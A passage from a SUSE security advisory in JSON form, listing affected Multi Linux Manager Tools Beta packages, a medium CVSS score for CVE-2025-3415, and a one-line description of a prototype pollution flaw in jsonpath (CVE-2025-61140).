"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "moderate"
}
],
"title": "CVE-2025-3415"
},
{
"cve": "CVE-2025-61140",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61140"
}
],
"notes": [
{
"category": "general",
"text": "The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
